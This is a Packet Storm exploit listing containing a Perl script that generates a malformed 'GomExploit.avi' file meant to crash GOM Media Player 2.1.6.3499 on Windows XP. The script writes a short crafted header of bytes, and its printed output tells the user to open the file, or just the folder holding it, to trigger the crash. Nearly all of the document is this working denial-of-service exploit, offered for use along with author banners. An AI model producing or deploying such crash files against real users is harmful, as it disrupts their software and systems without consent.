GOM Media Player 2.1.6.3499 Denial Of Service

2011-04-02T00:00:00
ID PACKETSTORM:99979
Type packetstorm
Reporter Xecuti0N3r
Modified 2011-04-02T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#(+)Exploit Title: GOM Media Player 2.1.6.3499 0day Buffer overflow/DOS Exploit  
#(+)Software Link: download.cnet.com/GOM-Media-Player/3000-2139_4-10701768.html  
#(+)Software : GOM Media Player  
#(+)Version : 2.1.6.3499  
#(+)Tested On : WIN-XP SP3  
#(+) Date : 31.03.2011  
#(+) Hour : 3:37 PM  
#Similar Bug was found by cr4wl3r in MediaPlayer Classic  
  
system("color 6");  
system("title GOM Media Player 2.1.6.3499 0day Buffer overflow/DOS Exploit");  
print "  
_______________________________________________________________________  
  
(+)Exploit Title: GOM Media Player 2.1.6.3499 0day Buffer overflow/DOS Exploit  
  
(+) Software Link: download.cnet.com/GOM-Media-Player/3000-2139_4-10701768.html   
(+) Software : GOM Media Player  
(+) Version : 2.1.6.3499   
(+) Tested On : WIN-XP SP3   
(+) Date : 31.03.2011   
(+) Hour : 13:37 PM   
____________________________________________________________________\n ";  
sleep 2;  
system("cls");  
system("color 2");  
print "\nGenerating the exploit file !!!";  
sleep 2;  
print "\n\nGomExploit.avi file generated!!";  
sleep 2;  
$theoverflow = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";  
  
open(file, "> GomExploit.avi");  
print (file $theoverflow);  
print "\n\n(+) Done!\n  
(+) Now Just open GomExplot.avi with Gom Player and Kaboooommm !! ;) \n  
(+) Most of the times there is a crash\n whenever you open the folder where the GomExploit.avi is stored :D \n";  
  
sleep 3;  
system("cls");  
sleep 1;  
system("color C");  
print "\n\n\n########################################################################\n  
(+)Exploit Coded by: ^Xecuti0N3r\n  
(+)^Xecuti0N3r: E-mail \n  
(+)d3M0l!tioN3r: E-mail \n  
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r & aNnIh!LatioN3r \n  
########################################################################\n\n";  
system("pause");  
`